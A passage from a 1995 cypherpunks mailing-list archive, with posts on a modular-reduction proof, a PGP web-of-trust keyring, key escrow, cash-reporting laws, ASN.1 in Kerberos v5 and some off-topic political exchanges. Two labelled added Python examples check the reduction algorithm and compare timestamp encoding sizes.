          Y < B^i + F  (reason see above) ,
          Y >= 0 ]
          



   if ( Y >= B^i )
      Y -= F                       // again shrinking,
                                   // still the same mod modulus



      [ Y = X mod ,
        Y >= 0    ,
        Y < B^i ]

 }



Last i was n+1, therefore

  Y = X mod ,  Y >= 0 , Y < B^(n+1)


This is not enough,  Y < B^n is requested. The loop can't be done once
more because i-n-1 would become negative.

k+1 was the length of X, and  n the length of the modulus. You walk
down from k to n+1 . In every loop you remove one block of the
number. This means you have to do len(X)-len(modulus) loops. In the
pseudocode you do only len(X)-len(modulus)-1 loops.



One loop seems to be missing. This may be a
result of confusion whether your Y starts with Y[0] or Y[1]. 


I do understand the algorithm as:

n = len(modulus)
U = B^n  mod modulus
K = B^n - U                         // = 0 mod modulus,  0 < K < B^n
Y = X

for(i=len(X)-1 ; i>= n ; i--)       // squeeze Block i in Number Y
 {                                  // Y < B ^ (i+1)

   F = B ^ ( i-n )  * K             // F = 0 mod modulus

   Y -= Y[i] * F                    // subtract  Y[i] * B^i, now Y < B ^ i
                                    // add the equivalent Y[i] * B^(i-n)*U <= F
                                    // now Y < B^i + F

   if ( Y >= B^i )
     Y -= F                         // now Y < B^i

 }

Last i was n, therefore Y < B^n , Y = X mod modulus , 
but perhaps still Y >= modulus.

Ok, algorithm understood and agreed (after modifying the loop counter).

Any more agreements or disagreements?

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 8 Sep 95 00:26:07 PDT
To: cypherpunks@toad.com
Subject: Re: Announce: Web of Trust Ring
Message-ID: <199509072300.RAA00742@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

First: after mailing myself the file in 16k chunks... the ring is up, and
intact. The only difference from what the original was supposed to be is
that both of my keys are now assigned a trust of unknown instead of 
undefined. *shrug* 

From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>

>A very interesting project!  Can you give us some data like how many is the
>maximum number of hops necessary to connect two people on the WoT?  (I am
>aware that one wouldn't want to trust such a connection, and that PGP 
>doesn't actually allow you to do so for hops > 2...)

My original message details the brute-force approach I took, and the
imperfections that it entails. If everybody who signed a key received a
signature back from the same person, the ring I generated really would be
"The" WoT. (I don't mean to center on "my ring" versus local WoTs that
people have, but I centered around Warlord, Zimmermann, and Jeff S., and
seeing as how those happen to be keys that come with PGP, that's where I'd
imagine most people would start looking.) Unfortunately, there are a lot
of nobodies included just because they signed someone else's key. For the
same reason, someone who was signed by a well-known key, but didn't sign
back, and didn't sign anybody else's key who was included, didn't make it
to the ring. Imperfections aside, the ring is 4.5 meg smaller than the
unimi keyring, which makes it Pretty Good[tm]. (ha ha)

I forgot to mention it before, but this keyring is most accurately
described as a keyring full of some of the people who are more relevant to
the Web of Trust than lots of the people who aren't in the keyring. 

PGP lets you define how many levels of trust you want. Due to the way
in which the ring was constructed, I'd guess that the longest chain could
not be longer than 6-8 keys. 

>(P.S.  I guess "12" based on the number of passes necessary.  That seems 
>like a really high number to me...)

No kidding. I ran the program with high priority most of the time, but
I was doing on my home 386... Hence the 4-6 hour runtimes per pass.

>Are any obvious pseudonyms in?  (I would guess not.)

YEEEEEEESSSSSSS, there are. 

(Hint: check for @whitehouse.gov)

>I wonder what sorts of statistical analyses could be done on this WoT?  

It's still full of _nobodies_ who only got in because they signed a known
key of someone they never met and mailed it to a keyserver. Unfortunately,
I don't have the technical abilities to check for mutual signatures, or
only include keys that are signed by someone already in the WoT. 

That's _my_ expert statistical analysis...

>Is it fairly evenly spread out or are the noticeably larger "clumps" of 
>mutual signatures?  How many keys *are* there in this (subset of the) WoT?

There's a couple people that have half a zillion sigs. Many people have
signed someone else's key but have no one else's sig on their own. 

>Here's a question:  for two randomly selected members of your WoT, how many
>signatures would a Man In The Middle have to fake in order to isolate 
>the one member from the other?

If we talk about the WoT instead of the WoN (web of nobodies) then I would
guess faking 2-3 specific (attacker-chosen) people would cut off a good
share of the keys, 4-5 for many more, and about 500 (ok, maybe only 15-25)
for some of the well connected people. 

For jargon's sake we can call those the Dial-up, the ISDN and the T3 people
respectively.

>Thanks for this, Don.

:)

- -Don the Dialup

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBME95P8La+QKZS485AQHmHQMAs0UXaSan5PWDfppPU1WCNuz7eiXgpxeS
Y+2vHc1ZofT+Mq99Y2+aMgZGPasowQ/zdLIf4mNLZR1QNEf7eUf9wCLXY2fH5REw
t4uwpvRlz9TkkaUbwSmW+kBXept8H7WE
=8kPL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 7 Sep 95 17:27:16 PDT
To: Rob Lowry <robl@on-ramp.ior.com>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.LNX.3.91.950906210405.19265B-100000@on-ramp.ior.com>
Message-ID: <Pine.BSD.3.91.950907172351.22454B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Sep 1995, Rob Lowry wrote:
> I am new to the crypto scene and still think PGP is neato ;)

Welcome, you will learn a lot of great material here, and yes it is 
neato.  I just wish it came pre-installed with WinDoze...

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 7 Sep 95 08:32:59 PDT
To: cypherpunks@toad.com
Subject: Re: fast modular reduction (proof?)
Message-ID: <9509071531.AA01869@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> In the following pseudocode, B is the radix in which the numbers are 
> represented (2^32 for a 32-bit machine), n is the length of modulus in 
> blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 
> is the length of X, and Y is the result.
> 
> 1. Y = X
> 2. For i from k down to n+1, repeat steps 3 and 4
> 3.    Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
> 4.    If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)




To do a proof I rewrite the algorithm:



n = len(modulus)                   // modulus < B^n

Y = X                              // obviously Y = X mod modulus


K =  B ^ (n+1) - U                 // U = B ^ (n+1) mod modulus,
                                   // therefore K = 0 mod modulus
                                   // furthermore K > 0


for (i=len(Y)-1 ; i>n  ;  i--)
 {

   F = B ^ (i-n-1) * K             // F > 0
                                   // F = 0 mod modulus

   Y -=  Y[i] * F                  // Y shrinking, but
                                   // Y still the same mod modulus


   if ( Y >= B^i )
      Y -= F                       // again shrinking,
                                   // still the same mod modulus

 }


This shows that Y was shrinking, but is still equal to X mod modulus.





To see whether Y really shrinks enough:

  Y = sum(i=0..len(Y)-1)  Y[i] * B^i


In the step Y = Y - Y[i] * B^i the highest block of Y is deleted (what
could be done fast by reducing the length of Y). 

  Now  Y < B^i





Afterwards the same value mod modulus is added to keep Y constant: 

  Y = Y + Y[i] * U * B^(i-n-1).


  Y[i]<B   ->  Y[i]+1  <= B
  
  U < modulus < B^n , therefore U < B^n

  ->    (Y[i]+1) * U < B * B^n  = B^(n+1)

  ->    Y[i] * U  < B^(n+1) - U

  ->    Y[i] * U *  B^ (i-n-1 )  < F




  Therefore after doing the addition

    Y < B^i + F


  Check of the last step:

  0 <= U < B^n therefore 

  B^n  <  B^(n+1) - U  <= B^(n+1)

  Therefore in every loop


  B^(i-1) < F <= B^i


  ->   Y-F  < B^i



Partial Correctness:






Y = X                              [ Y = X mod 
                                     Y < B^len(X) ]


K =  B ^ (n+1) - U                 [ K = 0 mod
                                     
                                     B^n < K <= B^(n+1) ]                
                                   
                                   


for (i=len(X)-1 ; i>n  ;  i--)
 {
        [ Y = X mod  ,  Y < B^(i+1) ]


   F = B ^ (i-n-1) * K 
   
        [ F = 0 mod  ,   B^(i-1) < F <= B^i  ]

        [ 0 <= Y[i] < B ]

        [ Y[i] * F  = 0 mod ,
          0 <= Y[i] * F  < B^(i+1) ]


        [ Y >= Y[i] * B^i  ->  Y >= Y[i] * F ]

   Y -=  Y[i] * F

        [ Y = X mod ,
          Y < B^i + F  (reason see above) ,
          Y >= 0 ]
          



   if ( Y >= B^i )
      Y -= F                       // again shrinking,
                                   // still the same mod modulus



      [ Y = X mod ,
        Y >= 0    ,
        Y < B^i ]

 }



Last i was n+1, therefore

  Y = X mod ,  Y >= 0 , Y < B^(n+1)


This is not enough,  Y < B^n is requested. The loop can't be done once
more because i-n-1 would become negative.

k+1 was the length of X, and  n the length of the modulus. You walk
down from k to n+1 . In every loop you remove one block of the
number. This means you have to do len(X)-len(modulus) loops. In the
pseudocode you do only len(X)-len(modulus)-1 loops.



One loop seems to be missing. This may be a
result of confusion whether your Y starts with Y[0] or Y[1]. 


I do understand the algorithm as:

n = len(modulus)
U = B^n  mod modulus
K = B^n - U                         // = 0 mod modulus,  0 < K < B^n
Y = X

for(i=len(X)-1 ; i>= n ; i--)       // squeeze Block i in Number Y
 {                                  // Y < B ^ (i+1)

   F = B ^ ( i-n )  * K             // F = 0 mod modulus

   Y -= Y[i] * F                    // subtract  Y[i] * B^i, now Y < B ^ i
                                    // add the equivalent Y[i] * B^(i-n)*U <= F
                                    // now Y < B^i + F

   if ( Y >= B^i )
     Y -= F                         // now Y < B^i

 }

Last i was n, therefore Y < B^n , Y = X mod modulus , 
but perhaps still Y >= modulus.

Ok, algorithm understood and agreed (after modifying the loop counter).

Any more agreements or disagreements?

Hadmut

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBME8QImc1jG5vDiNxAQFREgQAiMWfgy3bZtPckCNToAvKP7A+JevlnrqG
wJT6/111656nAZHDF5Htr2vwPEmiR522IvPKMG2MnOanMIRn2bgBYG3GECA3zlDo
ZnXNT1OXdtZzv848WPryLVjSJrrVTX/PUN9d6LaTqLBP5pZXwAYkO5kLU6/WP6yL
tF+fniXDZvk=
=Ev0S
-----END PGP SIGNATURE-----
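
[Added example, not part of either message and not the algorithm author's
code: a Python run of the quoted pseudocode that asserts, at every
iteration, the invariants the proof above states (Y congruent to X,
Y < B^i + F after step 3, Y < B^i after step 4). It also runs the loop as
rewritten at the end of the message so its result can be held against the
same bounds. The function names, the sample values and the final "% m" step
are assumptions made for this example.]

```python
import random


def blocks(x, B):
    """Number of radix-B blocks needed to write x (at least 1)."""
    count = 1
    while x >= B:
        x //= B
        count += 1
    return count


def reduce_quoted(x, m, B, check=True):
    """Quoted pseudocode: U = B^(n+1) mod m, i runs from k down to n+1.

    Returns Y with Y == x (mod m) and 0 <= Y < B^(n+1), which is the
    bound the proof in the message arrives at (not yet Y < B^n).
    """
    n = blocks(m, B)                 # modulus < B^n
    U = pow(B, n + 1, m)
    K = B ** (n + 1) - U             # K == 0 (mod m), B^n < K <= B^(n+1)
    y = x
    for i in range(blocks(x, B) - 1, n, -1):
        F = B ** (i - n - 1) * K     # B^(i-1) < F <= B^i
        top = y // B ** i            # block Y[i]; Y < B^(i+1) on entry
        if check:
            assert 0 <= top < B
        y -= top * F                 # Y - Y[i]*B^i + Y[i]*U*B^(i-n-1)
        if check:
            assert 0 <= y < B ** i + F
        if y >= B ** i:
            y -= F                   # Y - B^i + U*B^(i-n-1)
        if check:
            assert 0 <= y < B ** i and (y - x) % m == 0
    return y


def reduce_rewritten(x, m, B):
    """Loop as rewritten at the end of the message: U = B^n mod m, i >= n.

    Every step subtracts a multiple of m, so the result stays congruent
    to x. The range of the result is a separate question: with constructed
    values B=10, m=7, x=99 this returns 29, which is not below B^n = 10.
    """
    n = blocks(m, B)
    K = B ** n - pow(B, n, m)
    y = x
    for i in range(blocks(x, B) - 1, n - 1, -1):
        F = B ** (i - n) * K
        y -= ((y // B ** i) % B) * F     # Y[i] is block i of the current Y
        if y >= B ** i:
            y -= F
    return y


def full_reduce(x, m, B):
    """Quoted loop, then a finishing step assumed for this example:
    one ordinary reduction of the short (n+1)-block value."""
    return reduce_quoted(x, m, B) % m


def self_check(trials=200, seed=1995):
    """Run both loops on constructed random inputs with B = 2^32."""
    rng = random.Random(seed)
    B = 2 ** 32
    for _ in range(trials):
        m = rng.getrandbits(rng.randint(33, 512)) | 1
        x = rng.getrandbits(rng.randint(1, 2048))
        n = blocks(m, B)
        y = reduce_quoted(x, m, B)       # per-iteration asserts run inside
        if not (0 <= y < B ** (n + 1) and y % m == x % m):
            return False
        if reduce_rewritten(x, m, B) % m != x % m:
            return False
        if full_reduce(x, m, B) != x % m:
            return False
    return True


if __name__ == "__main__":
    print("quoted loop,    B=10 m=7 x=98765:", reduce_quoted(98765, 7, 10))
    print("rewritten loop, B=10 m=7 x=99   :", reduce_rewritten(99, 7, 10))
    print("random self-check passed:", self_check())
```
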




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 7 Sep 95 17:33:13 PDT
To: Gary Jeffers <gjeffers@socketis.net>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <199509070639.BAA00416@mail.socketis.net>
Message-ID: <Pine.BSD.3.91.950907173030.22454C-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Sep 1995, Gary Jeffers wrote:

> Date: Wed, 06 Sep 1995 22:42:42 -0500
> From: Gary Jeffers <gjeffers@socketis.net>
> To: cypherpunks@toad.com
> Subject: ON OFF-TOPIC
> 
>                     ON  OFF-TOPIC
> 
>      THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!
> 
> 
>        CRYPTO CODERS SUPPLY THE MEANS!
> CONSPIRACY THEORISTS SUPPLY THE MOTIVATION!
> 
> 
> conspiracy theorist = alternative political theorist
> NOT= AP/ABC/CBS/NBC/CIA/FBI/U.S GOV'N./New York Times/Washington Post
> opinion moulders syndicate
> 
> "extremist right-wing kook" = old fashioned American patriot
> Left term used often by left-wing extremist liberal statist kooks.
> 
> The United States "Federal" Government - we'll be even more American
> without it.
> 
> 
> 
>                                               PUSH EM BACK! PUSH EM BACK!
>                                               WWWAAAYYYY  BBBAAACCCK!
>                                               BBBEEEAAATTTT  STATE!
> 
> 

So true my friend, I have been saying this for years.  Glad to find 
another patriot here.   BTW, I love your cheer!

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 7 Sep 95 17:41:47 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <199509070834.EAA04213@frankenstein.piermont.com>
Message-ID: <Pine.BSD.3.91.950907173758.22454D-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Perry E. Metzger wrote:
> 
> Was this really needed?

Yes, it is my bet that there are some patriots in this list.  The desire 
to protect one's privacy is a very "patriot" thing to want to do.  
Cypherpunks appears to be a lot of people who are against big brother 
government, and quite probably for restoring the constitution...am I right?


> > Gary Jeffers writes:
> >                     ON  OFF-TOPIC
> > 
> >      THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!
> 

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 7 Sep 95 17:58:43 PDT
To: Jiri Baum <jirib@cs.monash.edu.au>
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <199509070600.QAA11675@molly.cs.monash.edu.au>
Message-ID: <Pine.BSD.3.91.950907174613.22454G-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Jiri Baum wrote:

> 
> >: : >>: OT7-48
> >: : >>: 1.   Find some plants, trees, etc., and communicate to them
> >: : >>: individually until you know they received your communication.
> >: : >>: 2.   Go to a zoo or a place with many types of life and communicate
> >: : >>: with each of them until you know the communication is
> >: : >>: received and, if possible, returned.
> 


I gotta read more of this drivel!   ROTFL!   ROTFL!!!


No wonder they don't want it out!  They look like they belong in the 
funny-farm....Have you ever seen those cute uniforms they wear?  
[really!  Hollywood California, I have *been* to their "church"]   
especially the girls, reminds me of school-uniforms, but they are all so 
grown up [yum!] but with the minds of a moron....[see above drivel they read]

I know this is somewhat off-topic, but I just *had* to say it!


||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 17:50:22 PDT
To: trei@process.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <ac74e2382f021004c882@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:59 PM 9/7/95, Pat Farrell wrote:
>>"If keys are escrowed, what purpose does a 64 bit limit serve?"
>
>This question was asked, it seems like a zillion times, but
>probably no more than four or five times.
>
>It is a bit of a belt and suspenders idea. But it also shows how
>scared they are about real encryption.
>
>It is clear that this meeting is a shame. Everyone in industry
                                    ^^^^^

Sham? Or shame? Or, likely, both?


Your account of the meeting merely confirms my worst fears.

But don't they say the Chinese character for "crisis" also means "opportunity"?

(Sort of the way the English word "oversight" has two very different and
opposite meanings.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 7 Sep 95 18:09:02 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <199509080057.UAA05313@frankenstein.piermont.com>
Message-ID: <Pine.BSD.3.91.950907180215.790B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Perry E. Metzger wrote:

> Date: Thu, 07 Sep 1995 20:57:32 -0400
> From: Perry E. Metzger <perry@piermont.com>
> To: starrd <starrd@iia2.org>
> Cc: cypherpunks@toad.com
> Subject: Re: ON OFF-TOPIC 
> 
> 
> starrd writes:
> > On Thu, 7 Sep 1995, Perry E. Metzger wrote:
> > > 
> > > Was this really needed?
> > 
> > Yes, it is my bet that there are some patriots in this list.
> 
> Pardon, but I don't care. There are also several socialists on this
> list. Shall I help them out by posting a long tract on the labor
> theory of value? There are several religious christians here. Shall we
> begin to discuss the divinity of Jesus? There are also some Jews here
> -- we could have a bunch of religious debates, and the atheists could
> kick in some mud, too. There are lots of folks here who wear shoes --
> perhaps we could discuss the merits of different brands.
> 

Nope.  but the patriots & the cyPHerpunks share a common goal, and belief 
that it is none of the government's business what we think or want to 
share with our computers.

> > The desire 
> > to protect one's privacy is a very "patriot" thing to want to do.  
> 
> But this isn't a list for "patriot"s.

Yes it is.  This list is for anyone who wants to preserve their privacy, 
but I do understand what you really meant.  :-^)


> > CyPherpunks appears to be a lot of people who are against big brother
> > government, and quite probably for restoring the constitution...am I right?
> 
> Cypherpunks is a list for people interested in cryptography and its
> impact on privacy, law, society, etc. It is not a list for people to
> discuss libertarianism, socialism, constitutionalism, whether the
> president has just flown over your ranch in a black helicopter, whether
> the CIA was responsible for brainwashing your pet rat Algernon,
> whether David Koresh was the messiah, or how many members of the
> Federal Protective Service it takes to change a paper shredder.

Agreed 

> 
> There are lots of places to discuss these topics on the net. There is
> only Cypherpunks for discussing the overall impact of cryptography on
> society, and this is a fairly good place to discuss crypto algorithms
> and the like because it is (amazingly) fairly high s/n compared to,
> say, sci.crypt. Please help out by not polluting one of the few places
> to discuss these issues with stuff you can talk about anywhere.

Again, I agree with you Perry.   In fact on a crypto-note [is that a 
word?] I would enjoy some discussion on SecDrv 1.4....anyone wanna talk 
about it v. PGP?  [is it as secure as PGP?]


||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 18:09:40 PDT
To: cypherpunks@toad.com
Subject: Legality of Cash Transactions
Message-ID: <ac74e578310210048bf7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 AM 9/8/95, Tobin T Fricke wrote:
>>letting it happen, and using cash instead of credit, is the smart answer
>
>I'm somewhat surprised at how much of an issue this is.   The
>federal government prints up nice green paper for us to pay for
>things with.  It's anonymous (to a large extent), universally
>accepted (most of the time), fairly untraceable (unless you
>really want to), easily available, doesn't collect interest,
>free to use, etc.  No one is forcing anyone to use credit
>cards, etc..  Then again, being a kid, I have never bought
>anything with anything other than cash on the spot...

I agree with what I think your sentiment is, but bear in mind that "cash
transactions" are in fact limited by various laws and regulations about
reporting cash payments.

Try buying a car with cash, especially a car costing over $10,000.

Black Unicorn posted an account a while back (sometime last year) of his
efforts to pay cash for a new car.

The restrictions on cash are mostly oriented toward ostensibly stopping
"drug profits" from being used to buy expensive items. The usual cash
figure that invokes special laws is $10,000, with "structuring" of sub-$10K
cash transfers an additional issue.

I foresee more restrictions coming, not fewer.

Several of us have written extensively on this subject.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodore Ts'o <tytso@MIT.EDU>
Date: Thu, 7 Sep 95 15:25:19 PDT
To: cypherpunks@toad.com
Subject: Re: Kerberos v5's experience with ASN.1
In-Reply-To: <9509071925.AA17839@toad.com>
Message-ID: <9509072225.AA26823@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   To: Cypherpunks Lite <cp-lite@comsec.com>
   Date: Sat, 2 Sep 1995 13:55:38 -0400
   From: jis@mit.edu (Jeffrey I. Schiller)

   However, the problem with ASN.1 isn't its waste of space (which actually
   isn't that bad for a mechanism for encoding arbitrary objects). 

While I won't argue about the rest of Jeff's note about the use of ASN.1
being a mistake, I do want to point out that certain ASN.1 types are in
fact very wasteful of space.

Most notable of these is the ASN.1 Generalized Time --- which encodes
the a timestamp in ASCII.  ASN.1 GeneralizedTime therefore requires 17
bytes to encode, an over four-fold increase in the amount of space
needed to store a time, compared with a 4 byte representation of "number
of seconds since 1970".  This is deadly in a protocol which has to store
lots of timestamps, which is the case in Kerberos V5.

We could have gotten around this problem by merely storing an integer
whenever we needed to store a timestamp, instead of using the ASN.1
abstract type.  Then it would have only taken 6 bytes (ASN.1 adds a
2-byte overhead for each object which you store).

					- Ted

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface

iQCVAwUBME9xO0QVcM1Ga0KJAQGiQwQAhSu4WpeVZ+hsN+o+NvWMwP8JK0GojhuI
vWE1M3iIZttz4iMEbsziZ1KzWlkFTL8AKVWkzDAZ8t5lNMis9qObCfaQPQkKTLwJ
UV20GjebckOzFx7Rp9OPDDI536cepvcjFN0cQkWtmiW2KP04TU9zr4caD4cfozDJ
XYGZavYmpBQ=
=9YUm
-----END PGP SIGNATURE-----
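
The size comparison in the message above, worked through as an added Python example (not part of the original post, and not Kerberos code). The helper names and the sample timestamp are constructed for illustration; the encodings are plain DER for GeneralizedTime (tag 0x18) and INTEGER (tag 0x02).

```python
import calendar
import struct
from datetime import datetime, timezone

TAG_INTEGER = 0x02
TAG_GENERALIZED_TIME = 0x18


def der_tlv(tag, content):
    """Wrap content in a DER tag + short-form length (content under 128 bytes)."""
    if len(content) >= 0x80:
        raise ValueError("long-form lengths are not needed for timestamps")
    return bytes([tag, len(content)]) + content


def der_generalized_time(ts):
    """Encode seconds-since-1970 as GeneralizedTime: ASCII YYYYMMDDHHMMSSZ."""
    dt = datetime.fromtimestamp(ts, tz=timezone.utc)
    return der_tlv(TAG_GENERALIZED_TIME, dt.strftime("%Y%m%d%H%M%SZ").encode("ascii"))


def der_integer(n):
    """Encode n as a DER INTEGER: minimal big-endian two's complement."""
    # One extra bit is always reserved for the sign, so 2**31 needs 5 bytes.
    length = (~n if n < 0 else n).bit_length() // 8 + 1
    return der_tlv(TAG_INTEGER, n.to_bytes(length, "big", signed=True))


def compare(ts):
    """Return the encoded size in bytes of each representation of ts."""
    return {
        "raw_uint32": len(struct.pack(">I", ts)),
        "der_integer": len(der_integer(ts)),
        "der_generalized_time": len(der_generalized_time(ts)),
    }


# Constructed sample: a timestamp from September 1995.
SAMPLE_TS = calendar.timegm((1995, 9, 7, 22, 25, 19))

if __name__ == "__main__":
    print(der_generalized_time(SAMPLE_TS).hex())
    print(der_integer(SAMPLE_TS).hex())
    print(compare(SAMPLE_TS))
    # Edge case: the first second that no longer fits in a signed 32-bit value.
    print(compare(2**31))
```

The INTEGER form stays at 6 bytes only while the value fits in 31 bits; from 2**31 seconds onward DER adds a leading zero byte to keep the sign bit clear, giving 7 bytes, still well under the 17 of GeneralizedTime.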



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 7 Sep 95 16:09:15 PDT
To: jis@mit.edu
Subject: Re: ASN.1 and Kerberos version 5
In-Reply-To: <199509071800.LAA20586@comsec.com>
Message-ID: <9509072233.AA03587@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sat, 2 Sep 1995 13:55:38 -0400
>From: jis@mit.edu (Jeffrey I. Schiller)


>I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos
>version 5. I had this disease at the time that made me think that ASN.1 was
>a good idea. I got better, unfortunately we have been living with the
>results of my braino for quite some time now... poor Ted.

Jeff,

	I'm collecting lists of ASN.1 problems as well as better solutions.
If you'd care to contribute....

Otherwise, I'll post the results when they're firmed up.  I got some
*great* material from Burt Kaliski at the P1363 meeting and that needs
to be folded in, so I know it's not soup yet.

 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Thu, 7 Sep 95 15:52:29 PDT
To: cypherpunks@toad.com
Subject: Re: GAK
Message-ID: <199509072302.SAA02407@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sun, 3 Sep 1995 21:25:26 -0400 (EDT)
>From: Brian Davis <bdavis@thepoint.net>

>Subject: Re: GAK

>On Fri, 1 Sep 1995, Timothy C. May wrote:
>
>> At 10:56 PM 9/1/95, Buford Terrell wrote:
>> 
>> >If you've ever watched Not_at_all_Funny Home Videos or any of the
>> >American Urinal school of tabloid television, you soon start feeling
>> >that the real threat to privacy is not the guvmint, but all of
>> >the yoyos with their little cam corders running around pointing them
>> >at people.
>> >
>> >Security cameras in ATMS and at airline ticket counters do more
>> >to threaten your privacy than do FIBBIE wiretaps, and PGP won't
>> >protect you from them. (and usually neither will the courts).
>> 
>> I absolutely agree with this, though this doesn't mean I'll stop worrying
>> about the government's plans for key escrow (GAK), about limits on key
>> lengths, or about other efforts to thwart strong security.
>
>I, of course, know of the "dislike" of GAK here.  I am curious to know, 
>however, if the "dislike" is because government would have access under 
>any circumstances or if the primary worry is that government will cheat 
>and get access when most would agree that they shouldn't (either by the 
>judge "cheating" or a TLA stealing it).
>
>In other words ... if it took agreement by a review board composed of 
>non-LEA members of this list, would the escrow be acceptable??
>
>EBD
>
In my case, it's simply a matter of principle: the government has no
right to know what I'm saying.  Search warrants may allow them to
get to "things" that I have, but the First and Fifth amendments make
words sacred.  If the government can eavesdrop on my conversation,
then my speech is no longer free.

